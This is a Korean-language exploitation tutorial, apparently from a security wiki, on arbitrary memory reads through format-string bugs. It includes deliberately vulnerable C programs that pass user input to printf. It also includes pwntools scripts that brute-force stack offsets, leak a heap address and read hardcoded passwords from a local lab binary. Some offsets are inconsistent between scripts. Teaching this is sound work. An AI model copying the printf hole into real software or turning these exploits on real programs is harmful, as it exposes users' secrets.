Format Strings - Arbitrary Read Example

Reading time: 4 minutes

Read Binary Start

코드

#include <stdio.h>

int main(void) {
char buffer[30];

fgets(buffer, sizeof(buffer), stdin);

printf(buffer);
return 0;
}

다음과 같이 컴파일하세요:

clang -o fs-read fs-read.c -Wno-format-security -no-pie

익스플로잇

from pwn import *

p = process('./fs-read')

payload = f"%11$s|||||".encode()
payload += p64(0x00400000)

p.sendline(payload)
log.info(p.clean())

• 오프셋은 11입니다. 여러 개의 A를 설정하고 브루트 포싱을 통해 0에서 50까지의 오프셋을 찾은 결과, 오프셋 11에서 5개의 추가 문자(우리의 경우 파이프 |)와 함께 전체 주소를 제어할 수 있음을 발견했습니다.
• **%11$p**를 사용하여 패딩을 추가하여 주소가 모두 0x4141414141414141이 되도록 했습니다.
• 포맷 문자열 페이로드는 주소 앞에 있어야 합니다. printf는 널 바이트에서 읽기를 멈추기 때문에, 주소를 보내고 나서 포맷 문자열을 보내면, printf는 널 바이트가 먼저 발견되어 포맷 문자열에 도달하지 못합니다.
• 선택된 주소는 0x00400000입니다. 이 주소는 바이너리가 시작되는 곳입니다(PIE 없음).

비밀번호 읽기

#include <stdio.h>
#include <string.h>

char bss_password[20] = "hardcodedPassBSS"; // Password in BSS

int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];

printf("Enter first password: ");
scanf("%19s", input1);

printf("Enter second password: ");
scanf("%19s", input2);

// Vulnerable printf
printf(input1);
printf("\n");

// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}

return 0;
}

다음과 같이 컴파일하세요:

clang -o fs-read fs-read.c -Wno-format-security

스택에서 읽기

**stack_password**는 로컬 변수이기 때문에 스택에 저장됩니다. 따라서 printf를 악용하여 스택의 내용을 보여주는 것만으로 충분합니다. 이는 스택에서 비밀번호를 유출하기 위해 처음 100개의 위치를 BF하는 익스플로잇입니다:

from pwn import *

for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()

이미지에서 10번째 위치에서 스택에서 비밀번호를 유출할 수 있음을 볼 수 있습니다:

데이터 읽기

%s 대신 %p를 사용하여 동일한 익스플로잇을 실행하면 %25$p에서 스택에서 힙 주소를 유출할 수 있습니다. 또한, 유출된 주소(0xaaaab7030894)를 해당 프로세스의 메모리에서 비밀번호의 위치와 비교하면 주소 차이를 얻을 수 있습니다:

이제 두 번째 포맷 문자열 취약점에서 접근하기 위해 스택에서 1개의 주소를 제어하는 방법을 찾아야 합니다:

from pwn import *

def leak_heap(p):
p.sendlineafter(b"first password:", b"%5$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)

for i in range(30):
p = process("./fs-read")

heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")

password_addr = heap_leak_addr - 0x126a

print(f"Try: {i}")
payload = f"%{i}$p|||".encode()
payload += b"AAAAAAAA"

p.sendline(payload)
output = p.clean()
print(output.decode("utf-8"))
p.close()

그리고 사용된 패스를 통해 try 14에서 주소를 제어할 수 있음을 확인할 수 있습니다:

Exploit

from pwn import *

p = process("./fs-read")

def leak_heap(p):
# At offset 25 there is a heap leak
p.sendlineafter(b"first password:", b"%25$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)

heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")

# Offset calculated from the leaked position to the possition of the pass in memory
password_addr = heap_leak_addr + 0x1f7bc

print(f"Calculated address is: {hex(password_addr)}")

# At offset 14 we can control the addres, so use %s to read the string from that address
payload = f"%14$s|||".encode()
payload += p64(password_addr)

p.sendline(payload)
output = p.clean()
print(output)
p.close()